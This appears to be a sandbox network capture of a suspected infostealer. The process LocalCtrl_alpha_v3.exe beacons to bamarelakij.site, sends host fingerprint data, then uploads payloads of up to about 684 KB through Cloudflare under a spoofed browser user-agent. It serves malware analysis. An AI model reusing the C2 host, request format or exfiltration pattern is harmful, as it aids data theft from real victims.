                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=f7d9fc537b3e4b46b2e7b1c2cf98f90b&HASH=f7d9&LV=202501&V=4&LU=1736430948768; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:55:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          Set-Cookie: MS0=57c05b318b0149ef8753696e6f2f509c; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:25:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          time-delta-millis: 1846
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:48 GMT
                                                                                                                                                                                                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 50002 | 104.21.80.52 | 443 | 2856 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:59 UTC | 354 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 147
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
2025-01-09 13:55:59 UTC | 147 | OUT | Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 00 00 00 00 00 60 00 00 00 fe ff ff ff 00 00 00 00 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 c1 60 aa cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd`$9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-09 13:56:00 UTC | 776 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:00 GMT
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9SLvDZNhDFVs1%2FpfLFPa7GZwfVagTdXjmzo67k8kJX9qByY9gXBBNNvCq8ZlS0wKjtPf8JeUFZ0fWuAI8vdmlVutqwapsHqRo7DA7vFtggz67eClf3lsaS45XnFOqnrNj6J"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ed9bdfad7292-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1850&min_rtt=1846&rtt_var=701&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1137&delivery_rate=1549893&cwnd=252&unsent_bytes=0&cid=70582f1e615719b6&ts=421&x=0"
                                                                                                                                                                                                                                                                          Data Ascii: 6W6IAt@@PplR\>lW6IA@\]lP2lW6IAsklkW6IA\
                                                                                                                                                                                                                                                                          2025-01-09 13:56:00 UTC1369INData Raw: 0f 17 15 04 c9 6c 04 c9 b8 ef 01 bd a4 f0 7d 37 6e c5 77 a1 06 7b 02 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 7b 02 d0 e9 8a dd b2 c1 4a d2 f5 0e 95 09 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 31 95 09 15 b4 35 53 07 82 0f 28 ff 0f 06 ff bc f6 db 63 7c 0e c1 0c 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 c1 0c 57 06 36 49 41 a7 98 95 c6 d0 e4 de da d2 ea da be c4 e4 de ee e6 ca e4 e6 02 0c 3d 02 15 00 06 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 3d 02 57 06 36 49 41 a7 98 95 a6 ca e4 ec ca e4 4f 00 84 0a 15 00 2a 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 84 0a 57 06 36 49 41 a7 98 95 9e ea e8 d8 de de d6 ae d2 dc 82 e0 e0 86 d8 c2 e6 e6 d2 c6 b8 82 e0 e0 88 c2 e8 c2 b8 98 de c6 c2 d8 b8 9e ea e8 d8 de de d6 13 01 d3 08 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9
                                                                                                                                                                                                                                                                          Data Ascii: l}7nw{l{Jl15S(c|lW6IA=l=W6IAO*lW6IAl
                                                                                                                                                                                                                                                                          2025-01-09 13:56:00 UTC1369INData Raw: 08 57 06 36 49 41 a7 98 95 9a 82 9c 92 8c 8a a6 a8 54 e4 06 45 0c 15 00 14 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 45 0c 57 06 36 49 41 a7 98 95 a8 d0 ea dc c8 ca e4 c4 d2 e4 c8 b8 a0 e4 de cc d2 d8 ca e6 91 0a d0 05 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd b8 d0 05 6e b0 78 a2 ec 20 d7 a4 80 0b 4b 0e 57 54 03 ef 87 04 5c 0d 15 00 08 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 5c 0d 57 06 36 49 41 a7 98 95 82 d8 d8 40 9a c2 d2 d8 2c 03 61 09 15 00 05 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 61 09 57 06 36 49 41 a7 98 95 54 5c c8 c2 e8 4e 06 b7 0c 15 00 0b 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 b7 0c 57 06 36 49 41 a7 98 95 98 de c6 c2 d8 40 a6 e8 c2 e8 ca 64 0f eb 0c 15 00 0e 00 08 1f 0f 17 15 04 d9 6c 08 d9 10 eb 0c 57 06 36 49 41 a7 98 95 ce ca c6 d6 de be c4 e4 de ee e6
                                                                                                                                                                                                                                                                          Data Ascii: W6IATElEW6IAlnx KWT\l\W6IA@,alaW6IAT\NlW6IA@dlW6IA


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 50010 | 104.21.80.52 | 443 | 2856 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:01 UTC | 385 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 53
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
2025-01-09 13:56:01 UTC | 53 | OUT | Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 03 00 00 00 00 02 00 00 00 fe ff ff ff 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii:
2025-01-09 13:56:01 UTC | 748 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:01 GMT
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RVvGIQLTDtqOG4aoxWcMMyv3MZI0Zo8rKPAKzG5CLsWH2NF8llDoGvUhi6tz36J%2FtcDgTbs6t46dSZ0HIXlYxRUpLuUGfOT%2BJGGRRCKIAEbvcZd9GR%2FgFYSTi%2FKyenitAxMU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4eda3ab435e80-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1724&rtt_var=648&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1074&delivery_rate=1684939&cwnd=218&unsent_bytes=0&cid=42793c781bd893e4&ts=328&x=0"
2025-01-09 13:56:01 UTC | 29 | IN | Data Raw: 31 37 0d 0a 00 00 00 00 07 00 00 00 fe ff ff ff 00 00 00 00 91 91 ce 09 b6 a6 61 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 17a
2025-01-09 13:56:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 50021 | 104.21.80.52 | 443 | 6712 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:02 UTC | 389 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 683229
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
2025-01-09 13:56:04 UTC | 767 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:04 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCxN4bgMnx11R0cRoVplK4jgH3mUQTto5bT9s93HhYO6FX%2F201tDYdB8H8%2B%2B3oJ0lLIG1E5yIX3pvpMotwNFpAFPBEaOxaXj8XES4JsXfTHc9CLmxlka9ritQWlUSMHHD66d"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4edafbf4343d4-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1590&rtt_var=838&sent=225&recv=688&lost=0&retrans=0&sent_bytes=2837&recv_bytes=686212&delivery_rate=1140625&cwnd=224&unsent_bytes=0&cid=b0b96b5f03e0dd2a&ts=1532&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 50036 | 104.21.80.52 | 443 | 6712 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:04 UTC | 386 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 745
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
2025-01-09 13:56:05 UTC | 758 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:05 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fubob8bQLiNviSliG4HAlArkrRufzILnUIUZAzK6erh41bIXFOz1py8yRjH9ju0%2B4FtzWjVJTRD%2FtyvjztY5HXFA6KLpROcdkgg7b76I77IuujVbyZfSWJpPBZ3LAoIgMj15"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4edbb6874726b-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1802&rtt_var=693&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1767&delivery_rate=1559829&cwnd=238&unsent_bytes=0&cid=1804536e24905d2f&ts=326&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 50042 | 104.21.80.52 | 443 | 6712 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:05 UTC | 386 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 212
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
2025-01-09 13:56:06 UTC | 757 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:06 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IUTZKsm6scmXt8vAEsfml2YnZLCVPXgZcrpG9UpGaTjQ6LPEov2BicfRfYHWvDY7lBpd1Fi58uPEbr1p0qE3zHjtPNt8viUMXSnAAZZaa54jnSzTWIR3WL0Tm9Bo4U9Zif99"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4edc139e71a44-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=65754&min_rtt=1920&rtt_var=38546&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1234&delivery_rate=1520833&cwnd=131&unsent_bytes=0&cid=fe63e1cc0059bbd7&ts=349&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 50049 | 104.21.80.52 | 443 | 6712 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:06 UTC | 386 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 380
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
2025-01-09 13:56:07 UTC | 758 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:07 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7CTl2RwPZn16XrFhceiV8tXdzI9Ipw4oKeWvZ8iy8LU1L0qXREiEMlm6f4hw72fRp4e8lJkQDK%2BJvu9lc4Lsn30wHydBg9rpDK7bi7nxxQl5PeIFsJJJ2I2C%2FV5xkzloL2WH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4edc74e0f8c71-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1874&min_rtt=1846&rtt_var=712&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1402&delivery_rate=1581798&cwnd=193&unsent_bytes=0&cid=36dd47a7aba43956&ts=424&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 50060 | 104.21.80.52 | 443 | 6712 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:08 UTC | 388 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 14825
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
2025-01-09 13:56:08 UTC | 766 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:08 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vqrjZlV4RTj1aqBMHYcawi%2BaZ1RP38h%2BMJ45Yr4DitGXIM%2FOnqgKFmogelLNyXXpEDYPOwMS03gXirvPvwAegbGdg7DMKtRqNi7liPAxKXSKH3zAST6m2uc8b3xX8vQ%2Bjm1%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4edd04a7f4259-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1647&rtt_var=622&sent=8&recv=20&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15871&delivery_rate=1752701&cwnd=235&unsent_bytes=0&cid=94d2b6f1d2864623&ts=329&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 50068 | 104.21.80.52 | 443 | 6712 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:09 UTC | 388 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 69022
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
2025-01-09 13:56:10 UTC | 778 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:10 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WavCL%2B0kisqWyKzrX%2FBSd2AKX4iCwKn2%2Bm%2Bt9ewaLIVq2txyZGACvgQ%2FqY9YQ%2BtxRxTO6exBo%2F5UrCIgGoEHFW73u0qFf1mB%2BWmBFHFcziPzFSNEEJAZoLspZ3%2BtW3tP2%2FI5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4edd9ae36425b-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2687&min_rtt=1608&rtt_var=1374&sent=27&recv=75&lost=0&retrans=0&sent_bytes=2838&recv_bytes=70222&delivery_rate=1815920&cwnd=241&unsent_bytes=0&cid=712d06ddd89095bf&ts=605&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 50075 | 104.21.80.52 | 443 | 6712 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:11 UTC | 385 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 35
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
2025-01-09 13:56:11 UTC | 35 | OUT | Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii:
2025-01-09 13:56:11 UTC | 722 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:11 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4M9ZTeNtBAkZhOGuUy0vzYxX41sxt5Sm677CM3Cmt9G1SO7YRPTfjJ45eOrMGFQxKO7gu7MRys7p7sfpUqmnF9SScNe9eVJQHR%2FbDU7JvfWWLs0ew9rnQIKiY3MfT9EbI7rV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ede17c691902-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1637&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1056&delivery_rate=1702623&cwnd=219&unsent_bytes=0&cid=b44dedf1afc0c020&ts=337&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.8 | 50094 | 104.21.80.52 | 443 | 2856 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:56:24 UTC | 389 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 684636
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          Data Ascii: rnbdrfdnVVpVfnlnn^jb^blr^b^h^hVl^^VVh^V^h^VlnVln^V^h^hVl^^VVh^V^h^VlnV^^rp`nhldlp
